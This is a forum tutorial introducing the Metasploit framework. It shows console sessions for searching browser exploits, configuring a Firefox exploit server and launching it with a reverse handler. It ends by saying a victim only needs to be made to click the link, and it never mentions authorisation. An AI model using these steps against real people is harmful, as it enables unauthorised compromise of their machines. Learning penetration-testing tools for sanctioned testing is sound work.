1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How to get started with Metasploit

Discussion in 'Ethical hacking Tips' started by lionaneesh, Jan 26, 2011.

  1. lionaneesh

    lionaneesh Active Member

    Mar 21, 2010
    Likes Received:
    Trophy Points:
    Metasploit is a Hacking Framework consisting of tools , exploits , Knowledge etc etc...Its a Boon to pen-testers , exploit developers and Hackers ...

    This Project was started by H.D Moore and is now open source project managed by Rapid7

    For Downloading and installing instructions Click here

    I will use my Ubuntu 10.10 OS for code samples. So , some commands maybe different on other OS versions and if you have queries and questions please don't hesitate to post in comments below.

    The directory structure

    Metasplot have a very self-explanatory and a user-friendly directory structure..

    The metasploit directory is located at /opt/metasploit3 in Linux

    aneesh@aneesh-laptop:~$ cd /opt/metasploit3/
    Lets see the different directories :-

    aneesh@aneesh-laptop:/opt/metasploit3$ ls
    app  bin  env.sh  lib  msf3  run.sh
    aneesh@aneesh-laptop:/opt/metasploit3$ cd msf3/
    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ ls
    armitage       HACKING  msfconsole  msfgui       msfpescan  plugins  tools
    data           lib      msfd        msfmachscan  msfrpc     README
    documentation  modules  msfelfscan  msfopcode    msfrpcd    scripts
    external       msfcli   msfencode   msfpayload   msfupdate  test
    The Data directory : contains the basic data for exploits like php sources , wordlists etc etc...

    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd data/
    aneesh@aneesh-laptop:/opt/metasploit3/msf3/data$ ls
    armitage             isight.bundle            passivex   vncdll.dll
    eicar.com            java                     php        vncdll.x64.dll
    eicar.txt            lab                      post       wmap
    emailer_config.yaml  meterpreter              snmp       wordlists
    exploits             msfcrawler               sounds
    gui                  msflinker_linux_x86.bin  sql
    ipwn                 msfpescan                templates
    The lib directory : The name is pretty self-explanatory , its the file that contains all the libraries necessary to work metasploit

    The main directory that is of great use to us is the modules directory

    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd modules
    aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ ls
    auxiliary  encoders  exploits  modules.rb.ts.rb  nops  payloads  post
    • The exploit dir : contains the exploits for various architectures
    • The encoders dir : Contains varoius encoders for encoding pages , programs etc etc...
    • The auxiliary dir : Contains a list of tools used for pen-testing like DOS , sniffers , etc etc..
    • The payloads, nops dir : Provides the shellcodes used for exploitations...(Code execution)

    Getting to know Metasploit

    The main part of metasploit is its interface types. The four main types of interfaces are :-
    1. msfweb (The Web Interface)
    2. msfgui (The graphical user interface)
    3. msfconsole (The console interface)
    4. msfcli (The command line interface)
    The most powerful and the most used interface is the Console interface so , We'll be looking at that throughout this tutorial...

    To open metasploit just type 'msfconsole' in your shell and you should get an output similar to this :-
    aneesh@aneesh-laptop:~$ msfconsole
                                     | |      o
     _  _  _    _ _|_  __,   ,    _  | |  __    _|_
    / |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
      |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
           =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
    + -- --=[ 643 exploits - 328 auxiliary
    + -- --=[ 216 payloads - 27 encoders - 8 nops
           =[ svn r11647 updated today (2011.01.26)
    msf > 
    Now that we know how to open metasploit lets see some of its modules...

    We use several commands for it :-

    The show all command syntax - show all
    The search command syntax - search (pattern)

    For eg :-

    Lets search for firefox exploits and see whats there in stores for us

    msf > search firefox
    [*] Searching loaded modules for pattern 'firefox'...
       Name                                              Disclosure Date  Rank       Description
       ----                                              ---------------  ----       -----------
       multi/browser/firefox_escape_retval               2006-07-14       normal     Firefox 3.5 escape() Return Value Memory Corruption
       multi/browser/firefox_queryinterface              2006-02-02       normal     Firefox location.QueryInterface() Code Execution
       multi/browser/mozilla_compareto                   2005-07-13       normal     Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
       multi/browser/mozilla_navigatorjava               2006-07-25       normal     Mozilla Suite/Firefox Navigator Object Code Execution
       windows/browser/apple_quicktime_rtsp              2007-01-01       normal     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
       windows/browser/awingsoft_winds3d_sceneurl        2009-11-14       excellent  AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
       windows/browser/dxstudio_player_exec              2009-06-09       excellent  Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
       windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
    msf > 
    You will notice that there are many of exploits on browser vulnerabilities..and maybe some are useful for us...

    This is the power of metasploit!!

    lets use the 'use' command to select a exploit

    Syntax :-
    use (path)
    Output :-
    msf > use exploit/multi/browser/firefox_escape_retval 
    msf exploit(firefox_escape_retval) > 
    Now lets see the options.
    show options
    Output :-
    msf exploit(firefox_escape_retval) > show options
    Module options (exploit/multi/browser/firefox_escape_retval):
       Name        Current Setting  Required  Description
       ----        ---------------  --------  -----------
       SRVHOST          yes       The local host to listen on.
       SRVPORT     8080             yes       The local port to listen on.
       SSL         false            no        Negotiate SSL for incoming connections
       SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
       URIPATH                      no        The URI to use for this exploit (default is random)
    Exploit target:
       Id  Name
       --  ----
       0   Firefox 3.5.0 on Windows XP SP0-SP3
    Let us now set the options

    This can be done by using :-

    set (option name) (value)
    Now lets set some options according to our needs
    msf exploit(firefox_escape_retval) > set SRVHOST localhost
    SRVHOST => localhost
    msf exploit(firefox_escape_retval) > set SRVPORT 80
    SRVPORT => 80
    msf exploit(firefox_escape_retval) > set URIPATH /exploit
    URIPATH => /exploit
    Explanations :-

    1. The 'set SRVHOST localhost' means set the host to localhost this is the server on which our exploit is hosted..
    2. The 'set SRVPORT 80' means this is the Post no on which the server will be hosted …
    3. As we know Post 80 is default for web-servers we use this The 'set URIPATH /exploit' means the URLPATH of the exploit...

    This means that we have to bring the victim to click on the page of url http://localhost/exploit
    So as to make the exploit work!!

    Now as the options are set lets run the exploit...

    This can be done by :-

    Output :-
    msf exploit(firefox_escape_retval) > exploit
    [*] Exploit running as background job.
    [*] Started reverse handler on 
    [*] Using URL: http://localhost:80/exploit
    [*] Server started.
    So the output states that we have successfully started the exploit!!

    Now the work gets a lot more easier...

    We just have to make a user with this Browser vulnerability click this link..

    I hope it is enough to get you started working with metasploit...
  2. lionaneesh

    lionaneesh Active Member

    Mar 21, 2010
    Likes Received:
    Trophy Points:
    Thanks Shabbir...
    For accepting my articles and making it much better with the edits...

    Thanks a ton!!!

Share This Page